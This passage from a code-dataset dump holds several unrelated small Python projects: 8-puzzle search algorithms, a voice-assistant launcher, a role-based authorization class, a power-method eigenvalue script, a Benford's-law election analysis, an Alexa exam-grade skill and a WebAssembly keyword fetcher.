    with open(f'ucs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a+') as file:\n        file.write(f\"Closed Set: {visited}\\n\")\n        for move_row, move_col, action in [(-1, 0, 'Up'), (1, 0, 'Down'), (0, -1, 'Left'), (0, 1, 'Right')]:\n            new_row = blank_row + move_row\n            new_col = blank_col + move_col\n            \n            if new_row < 0 or new_row >= 3 or new_col < 0 or new_col >= 3:\n                continue\n            \n            new_pos = new_row * 3 + new_col\n            new_state = state[:]\n            new_state[blank_pos], new_state[new_pos] = new_state[new_pos], new_state[blank_pos]\n            \n            cost = state[new_pos]  # the cost of a move is the value of the tile being moved\n            successors.append((action, new_state, cost, blank_pos))\n        file.write(f\"Successors : {successors}\\n\")\n    return successors\n\n# Uniform Cost Search algorithm\ndef ucs(start_state, goal_state):\n    nodes_popped = 0\n    nodes_expanded = 0\n    nodes_generated = 0\n    max_fringe_size = 0\n    \n    visited = set()\n    frontier = queue.PriorityQueue()\n    frontier.put((0, [start_state, [], 0, []]))\n    \n    # Keep expanding while the priority queue is non-empty\n    while not frontier.empty():\n        current_node = frontier.get()[1]\n        current_state, current_path, current_cost, current_pos = current_node\n        nodes_popped += 1\n        \n        # check whether the current state matches the goal state\n        if current_state == goal_state:\n            print(f'Nodes Popped: {nodes_popped}')\n            print(f'Nodes Expanded: {nodes_expanded}')\n            print(f'Nodes Generated: {nodes_generated}')\n            print(f'Max Fringe Size: {max_fringe_size}')\n            print(f'Solution Found at depth {len(current_path)} with cost of {current_cost}.')\n            print('Steps:')\n            file_name_ucs = f'ucs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n            file_ucs = open(file_name_ucs, \"a+\")\n            file_ucs.write(f\"\\n\\tNodes Popped: {nodes_popped}\\n\")\n            file_ucs.write(f\"\\tNodes Expanded: {nodes_expanded}\\n\")\n            file_ucs.write(f\"\\tNodes Generated: {nodes_generated}\\n\")\n            file_ucs.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n            file_ucs.write((f\"\\tSolution Found at depth {len(current_path)} with cost of {current_cost}.\"))\n            with open(file_name_ucs, 'r+') as file:\n                content = file.read()\n                file.seek(0, 0)\n                file.write(\"Method_selected: UCS \\nRunning UCS Algorithm \\n\" + content)\n            for step, pos in zip(current_path, current_pos):\n                print(f'\\tMove {pos} {step}')\n            print(\"Result found successfully!\")\n            return current_path\n\n        visited.add(tuple(current_state))\n        nodes_expanded += 1\n        \n        for action, new_state, cost, pos in get_successors_ucs(current_state, visited):\n            if tuple(new_state) not in visited:\n                nodes_generated += 1\n                new_path = current_path + [action]\n                new_cost = current_cost + cost\n                new_pos = current_pos + [pos]\n                frontier.put((new_cost, [new_state, new_path, new_cost, new_pos]))\n        \n        if frontier.qsize() > max_fringe_size:\n            max_fringe_size = frontier.qsize()\n    return None\n# a_star algorithm\ndef a_star(initial_state, goal_state):\n\n    # Calculate the heuristic value using the Manhattan distance\n    def distance(state):\n        dist = 0\n        for i in range(len(state)):\n            if state[i] != 0:\n                dist += abs(i // 3 - (state[i]-1) // 3) + abs(i % 3 - (state[i]-1) % 3)\n        return dist\n\n    class Node:\n        def __init__(self, state, parent=None, move=None, cost=0):\n            self.state = state\n            self.parent = parent\n            self.move = move\n            self.cost = cost\n            # Compute the heuristic value\n            self.heuristic = distance(state)\n            if self.parent:\n                self.depth = parent.depth + 1\n            else:\n                self.depth = 0\n\n        def __lt__(self, other):\n            return (self.cost + self.heuristic) < (other.cost + other.heuristic)\n\n    start_node = Node(initial_state)  # root search node: no parent, no move, zero cost\n\n
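    # The frontier is a priority queue ordered by Node.__lt__, i.e. lowest f = g + h (path cost + heuristic) first\n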
    nodes_popped = 0\n    nodes_expanded = 0\n    nodes_generated = 0\n    cost = 0\n    max_fringe_size = 0\n    frontier = queue.PriorityQueue()\n    frontier.put(start_node)\n    visited = set()\n\n    # Keep expanding while the priority queue is non-empty\n    while not frontier.empty():\n        if frontier.qsize() > max_fringe_size:\n            max_fringe_size = frontier.qsize()\n\n        node = frontier.get()\n        nodes_popped += 1\n\n        # check whether the current state matches the goal state\n        if node.state == goal_state:\n            cost = node.cost\n            path = []\n            while node.parent:\n                path.append(node.move)\n                node = node.parent\n            path.reverse()\n            depth = len(path)\n            print(f\"Nodes Popped: {nodes_popped}\")\n            print(f\"Nodes Expanded: {nodes_expanded}\")\n            print(f\"Nodes Generated: {nodes_generated}\")\n            print(f\"Max Fringe Size: {max_fringe_size}\")\n            print(f\"Solution Found at depth {depth} with cost of {cost}.\")\n            print(\"Steps:\")\n            file_name_astar = f'astar_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n            file_astar = open(file_name_astar, \"a\")\n            file_astar.write(f\"\\tNodes Popped: {nodes_popped}\\n\")\n            file_astar.write(f\"\\tNodes Expanded: {nodes_expanded}\\n\")\n            file_astar.write(f\"\\tNodes Generated: {nodes_generated}\\n\")\n            file_astar.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n            file_astar.write((f\"\\tSolution Found at depth {depth} with cost of {cost}.\"))\n            with open(file_name_astar, 'r+') as file:\n                content = file.read()\n                file.seek(0, 0)\n                file.write(\"Method_selected: ASTAR \\nRunning ASTAR Algorithm \\n\" + content)\n            for step in path:\n                print(f\"\\t{step}\")\n            print(\"Result found successfully!\")\n            return None\n        \n        with open(f'astar_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a+') as file:\n            file.write(f'Closed Set: {visited}\\n')\n            visited.add(node.state)\n            nodes_expanded += 1\n            for move, state in get_successors_astar(node.state, file):\n                if state not in visited:\n                    child = Node(state, parent=node, move=move, cost=node.cost+1)\n                    frontier.put(child)\n                    nodes_generated += 1\n    return None\n\n# This function will return all successors of the node\ndef get_successors_astar(state, file):\n    successors = []\n    i = state.index(0)\n    if i not in [0, 1, 2]:\n        new_state = list(state)\n        new_state[i], new_state[i-3] = new_state[i-3], new_state[i]\n        successors.append((\"Move {} Down\".format(state[i-3]), tuple(new_state)))\n    if i not in [6, 7, 8]:\n        new_state = list(state)\n        new_state[i], new_state[i+3] = new_state[i+3], new_state[i]\n        successors.append((\"Move {} Up\".format(state[i+3]), tuple(new_state)))\n    if i not in [0, 3, 6]:\n        new_state = list(state)\n        new_state[i], new_state[i-1] = new_state[i-1], new_state[i]\n        successors.append((\"Move {} Right\".format(state[i-1]), tuple(new_state)))\n    if i not in [2, 5, 8]:\n        new_state = list(state)\n        new_state[i], new_state[i+1] = new_state[i+1], new_state[i]\n        successors.append((\"Move {} Left\".format(state[i+1]), tuple(new_state)))\n    file.write(f'Fringe steps : \\n{successors}\\n')\n    return successors\n\n\n# Greedy Search Algorithm\ndef greedy(start, goal):\n    visited = set()\n    fringe = queue.PriorityQueue()\n    fringe.put((heuristic_value(start, goal), start, []))\n    max_fringe_size = 1\n    \n    nodes_popped = 0\n    nodes_expanded = 0\n    nodes_generated = 1\n\n    # Keep expanding while the fringe is non-empty\n    while not fringe.empty():\n        _, current, path = fringe.get()\n        nodes_popped += 1\n        \n        # check whether the current state matches the goal state\n        if current == goal:\n
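            # Goal reached: report search statistics and record them in the trace file\n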
            print(f'Nodes Popped: {nodes_popped}')\n            print(f'Nodes Expanded: {nodes_expanded}')\n            print(f'Nodes Generated: {nodes_generated}')\n            print(f'Max Fringe Size: {max_fringe_size}')\n            print(f'Solution Found at depth {len(path)} with cost of {int(len(path)*4.6)}.')\n            print('Steps:')\n            for step in path:\n                print(step)\n            print(\"Result found successfully!\")\n            file_name_greedy = f'greedy_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n            file_greedy = open(file_name_greedy, \"a+\")\n            file_greedy.write(f\"\\n\\tNodes Popped: {nodes_popped}\\n\")\n            file_greedy.write(f\"\\tNodes Expanded: {nodes_expanded}\\n\")\n            file_greedy.write(f\"\\tNodes Generated: {nodes_generated}\\n\")\n            file_greedy.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n            file_greedy.write((f\"\\tSolution Found at depth {len(path)} with cost of {int(len(path)*4.6)}.\"))\n            with open(file_name_greedy, 'r+') as file:\n                content = file.read()\n                file.seek(0, 0)\n                file.write(\"Method_selected: Greedy \\nRunning Greedy Algorithm \\n\" + content)\n            return\n        \n        with open(f'greedy_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a+') as file:\n            visited.add(current) # adding the explored node to visited set\n            nodes_expanded += 1\n            for neighbor in get_successors_greedy(current, file):\n                if neighbor not in visited:\n                    cost = heuristic_value(neighbor, goal)\n                    fringe.put((cost, neighbor, path + [moves_greedy(current, neighbor)]))\n                    nodes_generated += 1\n                    file.write(f'\\nvisited: {visited}, move: {moves_greedy(current, neighbor)}\\n')\n            max_fringe_size = max(max_fringe_size, fringe.qsize())\n    \n    return None, nodes_popped, nodes_expanded, nodes_generated, max_fringe_size\n\n\ndef get_successors_greedy(state, file):\n    neighbors = []\n    x, y = divmod(state.index('0'), 3)\n    for dx, dy in [(0, -1), (-1, 0), (0, 1), (1, 0)]:\n        newx, newy = x + dx, y + dy\n        if 0 <= newx < 3 and 0 <= newy < 3:\n            neighbor = list(state)\n            neighbor[x*3+y], neighbor[newx*3+newy] = neighbor[newx*3+newy], neighbor[x*3+y]\n            neighbors.append(''.join(neighbor))\n    file.write(f'Successors : \\n{neighbors}\\n')\n    return neighbors\n\n# This function will return the heuristic value based on the Manhattan distance\ndef heuristic_value(state, goal):\n    distance = 0\n    for i in range(len(state)):\n        x1, y1 = divmod(state.index(str(i)), 3)\n        x2, y2 = divmod(goal.index(str(i)), 3)\n        distance += abs(x1 - x2) + abs(y1 - y2)\n    return distance\n\n# To get all the moves\ndef moves_greedy(state1, state2):\n    index1, index2 = state1.index('0'), state2.index('0')\n    x1, y1 = divmod(index1, 3)\n    x2, y2 = divmod(index2, 3)\n    if y1 > y2:\n        return f\"\\tMove {state1[index2]} Left\"\n    elif y1 < y2:\n        return f\"\\tMove {state1[index2]} Right\"\n    elif x1 > x2:\n        return f\"\\tMove {state1[index2]} Up\"\n    elif x1 < x2:\n        return f\"\\tMove {state1[index2]} Down\"\n\n\ndef read_input_txt_to_list_format(file_name):\n    with open(file_name, 'r') as f:\n        lines = f.readlines()\n    return [[int(i) for i in line.split()] for line in lines[:3]]\n\ndef read_input_txt_to_list(file_name):\n    with open(file_name, 'r') as f:\n        lines = f.readlines()\n    return [int(i) for line in lines[:3] for i in line.split()]\n\ndef read_input_txt_to_tuple_format(file_name):\n    with open(file_name, 'r') as f:\n        lines = f.readlines()\n    return tuple([int(i) for line in lines[:3] for i in line.split()])\n\ndef read_input_txt_to_string_format(file_name):\n    with open(file_name, 'r') as f:\n        return \"\".join(f.readlines()[:3])\n\nif __name__ == '__main__':\n    \"\"\" Takes 5 command-line arguments, of which the last 2 are optional\n
        1) Python execution file\n        2) Start file\n        3) Goal file\n        4) Method (optional, defaults to astar)\n        5) Dump flag (optional, defaults to false)\n    \"\"\"\n    if len(sys.argv) < 3:\n        print(\"Need to give at least 3 arguments: expense_8_puzzle.py <start-file> <goal-file> [<method>] [<dump-flag>]\")  # if fewer than 3 arguments are given, print the usage message and exit\n        sys.exit()\n\n    # Storing the input arguments to the variables\n    start_file = sys.argv[1]\n    goal_file = sys.argv[2]\n    method = sys.argv[3].lower() if len(sys.argv) > 3 else 'astar'\n    dump_flag = True if len(sys.argv) > 4 and sys.argv[4].lower() == 'true' else False\n\n    print(f\"{'>>' * 30} Executing {method} algorithm{'<<' * 30}\")\n\n    # Dispatch to the algorithm selected by the user\n    if method == 'bfs':\n        start_state = read_input_txt_to_list_format(start_file)\n        goal_state = read_input_txt_to_list_format(goal_file)\n        bfs(start_state, goal_state)\n\n    if method == 'ucs':\n        start_state = read_input_txt_to_list(start_file)\n        goal_state = read_input_txt_to_list(goal_file)\n        ucs(start_state, goal_state)\n\n    if method == 'astar':\n        start_state = read_input_txt_to_tuple_format(start_file)\n        goal_state = read_input_txt_to_tuple_format(goal_file)\n        a_star(start_state, goal_state)\n\n    if method == 'greedy':\n        start_state = \"\".join(map(str, read_input_txt_to_list(start_file)))\n        goal_state = \"\".join(map(str, read_input_txt_to_list(goal_file)))\n        greedy(start_state, goal_state)","repo_name":"AAmitha/AI_Expense_8_Puzzle","sub_path":"expense_8_puzzle.py","file_name":"expense_8_puzzle.py","file_ext":"py","file_size_in_byte":18398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"1925879926","text":"import os\nimport time\nfrom modules.user_info_management import register_user,reset_data\nfrom modules.conversation import speech_text, text_speech\nimport Hope_female\nimport Hope_male\nimport vlc\n\nUSER_DIR = \"user\"\nWAKE_UP = \"hope\"\n\ns_t = speech_text()\nt_s = text_speech()\n\nif not os.path.isdir(USER_DIR):\n    os.mkdir(USER_DIR)\n\n# Check if the user is registered to the system\nif len(os.listdir(f'{USER_DIR}')) == 0:\n    p = vlc.MediaPlayer(\"tune/start.mp3\").play()\n    time.sleep(7)\n    t_s.speak_male(\"Hello!\")\n    t_s.speak_male(\"Welcome to the Project, VASU.\")\n    t_s.speak_male(\"Voice Activated Support Utility.\")\n    t_s.speak_male(\"I can help you find different household items lying on the floor.\")\n    time.sleep(0.1)\n    t_s.speak_male(\"To work properly, I would like to know some details about you.\")\n    reg = register_user()\n\nprint(\"listening secretly...\")\n\nwhile True:\n    text = s_t.listen(give_response=False)\n    if WAKE_UP in text.split():\n        try:\n            with open(\"gender.txt\",\"r\") as f:\n                st = f.read()\n        except:\n            st = \"\"\n            print(\"file not found : gender.txt\\nGenerating file : gender.txt\")\n            with open(\"gender.txt\",\"w\") as f:\n                f.write(\"male\")\n            print(\"Running Hope_male\")\n\n        if st == \"female\":\n            print(\"Found female\")\n            vlc.MediaPlayer(\"tune/open.mp3\").play()\n            time.sleep(3)\n            Hope_female.run()\n        else: #if st == \"male\":\n            print(\"Found male\")\n            vlc.MediaPlayer(\"tune/open.mp3\").play()\n            time.sleep(3)\n            Hope_male.run()","repo_name":"imrk97/final_year_project","sub_path":"final_project/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"43522778265","text":"import fnmatch\n
import logging\n\nfrom ..auth import User\nfrom .authorization import Authorization\n\n\nclass PlainAuthorization(Authorization):\n    def __init__(self, name, realm, config):\n        self.config = config\n        assert self.config[\"type\"] == \"plain\"\n        self.roles = self.config.get(\"roles\", {})\n        self.user_attributes = self.config.get(\"user-attributes\", {})\n        self.role_attributes = self.config.get(\"role-attributes\", {})\n        super().__init__(name, realm, config)\n\n    def get_roles(self, user: User) -> list:\n\n        if user.realm != self.realm():\n            raise ValueError(\n                \"Trying to authorize a user in the wrong realm, expected {}, got {}\".format(self.realm(), user.realm)\n            )\n\n        # return all roles this user belongs to\n        authorized_roles = []\n        for role, users in self.roles.items():\n            if user.username in users:\n                authorized_roles.append(role)\n                logging.debug(\"User {} given role {}\".format(user.username, role))\n\n        return authorized_roles\n\n    def get_attributes(self, user: User) -> dict:\n        if user.realm != self.realm():\n            raise ValueError(\n                \"Trying to authorize a user in the wrong realm, expected {}, got {}\".format(self.realm(), user.realm)\n            )\n\n        attributes = {}\n\n        for user_pattern, extra_attributes in self.user_attributes.items():\n            if fnmatch.fnmatch(user.username, user_pattern):\n                attributes.update(extra_attributes)\n\n        for r in user.roles:\n            attributes.update(self.role_attributes.get(r, {}))\n\n        return attributes\n\n    def collect_metric_info(self):\n        return {}\n","repo_name":"ecmwf/polytope-server","sub_path":"polytope_server/common/authorization/plain_authorization.py","file_name":"plain_authorization.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"23775612051","text":"import numpy as np\n\n\ndef func(a,x):\n    \n    for i in range(10):\n        x = np.dot(a, x)\n    x_n = x / x.min()\n    print('Power method:')\n    print('Eigenvector of matrix {} is {}:'.format(a, x_n))\n    find_ray(a,x_n)\n    print(\"\\n\")\n    \ndef find_ray(a,x_n):\n    h=np.dot(a,x_n)\n    m=np.dot(h,x_n)\n    \n    x_2=np.dot(x_n,x_n)\n    dom_eival=m/x_2\n    print('Rayleigh quotient method:')\n    print('The dominant eigenvalue for matrix {} is {:.2f}'.format(a.tolist(),dom_eival))\n    print(\"\\n\\n\")\n    \n\n\nab = np.array([[2, -12], \n               [1, -5]]) \n\na=np.array([[2,1],[0,-4]]) \nx=np.array([1,1]) \nb=np.array([[-5,0,0],[3,7,0],[4,-2,3]])\nc=np.array([[1,2,-2],[-2,5,-2],[-6,6,-3]])\nx1=np.array([1,1,1])\nfunc(ab,x)\nfunc(a,x)\nfunc(b,x1)\nfunc(c,x1)","repo_name":"jddark62/SCL-2K22","sub_path":"WS2/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20541312068","text":"def Euclide(a, b):\n    if b == 0:\n        return a\n    return Euclide(b, a % b)\n\n\nw = input().split()\nh = int(w[1])\nw = int(w[0])\nans = 1\nbuf = 1\nw -= 1\nh -= 1\ns = w + h\nfor m in range(min(w, h), 0, -1):\n    ans *= s\n    buf *= m\n    e = Euclide(ans, buf)\n    ans /= e\n    buf /= e\n    print(m, ans, buf, e)\n    s -= 1\nans /= buf\nprint(int(ans % 1000000007))\n","repo_name":"Zu-rin/AtCoder","sub_path":"AtCoder_Beginner_Contest/ABC034/ABC034C.py","file_name":"ABC034C.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"14944075744","text":"#!/usr/bin/python3\nimport pandas as pd\nfrom scipy.stats import chisquare, chi2\nfrom numpy import log10\n\nturno = ['1', '2']\nano = ['2014', '2018']\n
estado = [\n    \"AC\", \"AL\", \"AM\", \"AP\", \"BA\", \"CE\", \"DF\", \"ES\", \"GO\", \"MA\", \"MG\", \"MS\", \"MT\",\n    \"PA\", \"PE\", \"PI\", \"PR\", \"RJ\", \"RN\", \"RO\", \"RR\", \"RS\", \"SC\", \"SE\", \"SP\", \"TO\",\n    \"ZZ\"\n]\nnomeDoVotavel = []\ndirbase = \"eleicoes/\"\ncodificacao = \"ISO-8859-1\"\ndelimitador = \";\"\nfor a in ano:\n    for t in turno:\n        print(f\"TABELA TURNO {t} ANO {a}\\n\")\n        arquivoFrequenciaRelativa = f\"{dirbase}{a}/frequencia-relativa-t{t}-{a}.csv\"\n        frel = pd.read_csv(arquivoFrequenciaRelativa, encoding = codificacao, delimiter = delimitador) \n        nomeDoVotavel = list(frel.columns)\n        nomeDoVotavel = [nome.upper() for nome in nomeDoVotavel]\n        retirar = [\"BRANCO\", \"NULO\", \"DÍGITO\"]\n        for r in retirar:\n            nomeDoVotavel.remove(r)\n\n        nomeDoVotavel.append(\"BRANCO\")\n        nomeDoVotavel.append(\"NULO\")\n        for nome in nomeDoVotavel:\n            print(f\"{nome} \", end = '')\n            for fq in frel[nome]:\n                print(f\"{fq:4.2f} \", end = '')\n\n            print(\"\")\n\n        print(\"\\n\")\n        totalDeMunicipios = 0\n        votosExtremos = {}\n        for nome in nomeDoVotavel:\n            votosExtremos[nome] = {\"MIN\": 1.0e+10, \"MAX\": -1.0e+10, \"QT_MUNICIPIOS\" : 0}\n\n        print(f\"TABELA MÍNIMO E MÁXIMO DE VOTOS NO TURNO {t} ANO {a}\\n\")\n        for es in estado:\n            ap = f\"{dirbase}{a}/apuracao-t{t}-{a}-{es}.csv\"\n            dfAux = pd.read_csv(ap, encoding = codificacao, delimiter = delimitador)\n            totalDeMunicipiosNoEstado = len(dfAux[\"NM_MUNICIPIO\"].unique())\n            totalDeMunicipios += totalDeMunicipiosNoEstado\n            for nome in nomeDoVotavel:\n                votos = dfAux.loc[(dfAux[\"NM_VOTAVEL\"] == nome) & (dfAux[\"QT_VOTOS\"] > 0)]\n                if(len(votos) > 0):\n                    votosExtremos[nome][\"QT_MUNICIPIOS\"] += len(votos['NM_MUNICIPIO'].unique())\n                    votosMin = votos['QT_VOTOS'].min()\n                    votosMax = votos['QT_VOTOS'].max()\n                    if(votosMin < votosExtremos[nome][\"MIN\"]):\n                        votosExtremos[nome][\"MIN\"] = votosMin\n\n                    if(votosMax > votosExtremos[nome][\"MAX\"]):\n                        votosExtremos[nome][\"MAX\"] = votosMax\n\n        for nome in votosExtremos.keys():\n            print(f\"{nome} {votosExtremos[nome]['MIN']} {votosExtremos[nome]['MAX']} {(100.0*votosExtremos[nome]['QT_MUNICIPIOS']/totalDeMunicipios):5.2f}\")\n        \n        print(f\"Total de Municípios: {totalDeMunicipios}\\n\")\n        print(f\"TESTE DE ADERÊNCIA TURNO {t} ANO {a}\")\n        lfrel = []\n        leiDeBenford = [100.0*(log10(x + 1) - log10(x)) for x in range(1, 10)]\n        leiDeBenford[7] = leiDeBenford[7] + leiDeBenford[8]\n        leiDeBenford.pop()\n        degreeOfFreedom = len(leiDeBenford) - 1\n        alfa = 0.05\n        chiCritico = chi2.ppf(1 - alfa, degreeOfFreedom)\n        print(f\"(chiCritico = {chiCritico:6.4f}, alfa = {alfa})\\n\")\n        for nome in nomeDoVotavel:\n            lfrel = frel.loc[0:6, nome]\n            lfrel[7] = (frel.loc[7, nome] + frel.loc[8, nome])\n            chi, p = chisquare(lfrel, leiDeBenford)  # observed data frequencies first, expected Benford frequencies second\n            if(chi < chiCritico):\n                print(f\"{nome} Sucesso {chi:6.4f} {p:6.4f}\")\n            else:\n                print(f\"{nome} Falha {chi:6.4f} {p:6.4f}\")\n\n            print(\"\")","repo_name":"lucaskrispim/Benford","sub_path":"gerarTabelas.py","file_name":"gerarTabelas.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"15868725643","text":"from __future__ import print_function\n\ndef lambda_handler(event, context):\n    \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n    etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"GradePercentageIntent\":\n return get_percentage_grade(intent, session)\n if intent_name == \"GradePassIntent\":\n return get_pass_grade(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n# --------------- Functions that control the skill's behavior ------------------\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to Exam Grade Estimator. \" \\\n \"Here you can determine how much you need to get in the exam to get your target mark \" \\\n \"in the course. Just ask, I am going into the exam with a 78 percent, what do I need on the 40 percent exam \" \\\n \"to get 82 percent in the course. 
Or, if you are the watch movies through exam type, just ask, \" \\\n \"I am going into the exam with a 65 percent, what do I need in order to pass the course\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Tell me the mark you want in the course \" \\\n \"and I will guess the grade you need on your exam based on the grade you have going into it.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for using the exam grade estimator. \" \\\n \"Good luck on your exams! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef get_percentage_grade(intent, session):\n\n card_title = intent['name']\n session_attributes = {}\n should_end_session = True\n\n if 'current_grade' in intent['slots'] and 'exam_percentage' in intent['slots'] and 'desired_grade' in intent['slots']:\n if 'value' in intent['slots']['current_grade'] and 'value' in intent['slots']['exam_percentage'] and 'value' in intent['slots']['desired_grade']:\n\n current_grade = int(intent['slots']['current_grade']['value'])\n exam_percentage = int(intent['slots']['exam_percentage']['value'])\n desired_grade = int(intent['slots']['desired_grade']['value'])\n\n\n so_far_grade = float(current_grade)*(1 - exam_percentage/100.0)\n needed_exam_grade = float((desired_grade - so_far_grade))/exam_percentage\n percent_needed = str(needed_exam_grade*100)\n if (needed_exam_grade < 0):\n percent_needed = \"literally below 0\"\n\n\n speech_output = \"In order to get \" + str(desired_grade) + \" percent in the course, \" \\\n \"you need to get \" + percent_needed + \" percent on the exam.\" \n\n \n reprompt_text = \"Tell me the mark you want in the course \" \\\n \"and I will guess the grade you need on your exam based on the grade you have going into it.\"\n\n\n else:\n speech_output = \"Your command is incomplete. Please try again or ask for help.\"\n reprompt_text = \"Your command is incomplete. Please try again or ask for help.\"\n else:\n speech_output = \"I'm not sure what your question was. \" \\\n \"Please try again.\"\n reprompt_text = \"I'm not sure what your question was. 
\" \\\n \"Please try again.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef get_pass_grade(intent, session):\n\n card_title = intent['name']\n session_attributes = {}\n should_end_session = True\n\n if 'current_grade' in intent['slots'] and 'exam_percentage' in intent['slots']:\n if 'value' in intent['slots']['current_grade'] and 'value' in intent['slots']['exam_percentage']:\n\n current_grade = int(intent['slots']['current_grade']['value'])\n exam_percentage = int(intent['slots']['exam_percentage']['value'])\n desired_grade = 50\n\n\n so_far_grade = float(current_grade)*(1 - exam_percentage/100.0)\n needed_exam_grade = float((desired_grade - so_far_grade))/exam_percentage\n percent_needed = str(needed_exam_grade*100)\n if (needed_exam_grade < 0):\n percent_needed = \"literally below 0\"\n\n\n speech_output = \"In order to pass the course, \" \\\n \"you need to get \" + percent_needed + \" percent on the exam.\" \n\n \n reprompt_text = \"Tell me the mark you want in the course \" \\\n \"and I will guess the grade you need on your exam based on the grade you have going into it.\"\n\n\n else:\n speech_output = \"Your command is incomplete. Please try again or ask for help.\"\n reprompt_text = \"Your command is incomplete. Please try again or ask for help.\"\n else:\n speech_output = \"I'm not sure what your question was. \" \\\n \"Please try again.\"\n reprompt_text = \"I'm not sure what your question was. \" \\\n \"Please try again.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n# --------------- Helpers that build all of the responses ----------------------\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }","repo_name":"daquilnp/alexapi","sub_path":"ExamGradeEstimator/exam_grade_estimator.py","file_name":"exam_grade_estimator.py","file_ext":"py","file_size_in_byte":8961,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20596989651","text":"#!/usr/bin/env python3\n\n# https://webassembly.github.io/spec/core/appendix/index-instructions.html\n# https://webassembly.github.io/spec/core/appendix/index-types.html\n\nimport requests\n\nCORE_URL = 'https://webassembly.github.io/spec/core/appendix/index-instructions.html'\nWABT_KEYWORDS_URL=\\\n \"https://raw.githubusercontent.com/WebAssembly/wabt/main/src/lexer-keywords.txt\"\n\ndef get_keywords_wabt(url):\n response = requests.get(url)\n response.raise_for_status()\n content = response.text.strip().split('\\n')\n idx = content.index(next(line for line in content if '%%' in line))\n res = { 'keywords': [], 'types': [], 'ops': [] }\n kws, types, ops = [], [], []\n for line in sorted(content[idx+1:]):\n parts = line.lower().split(', ')\n if len(parts) == 2 and parts[1].startswith('type::'):\n res['types'].append(parts[0])\n elif len(parts) == 3 and parts[2].startswith('opcode::'):\n res['ops'].append(parts[0])\n else:\n 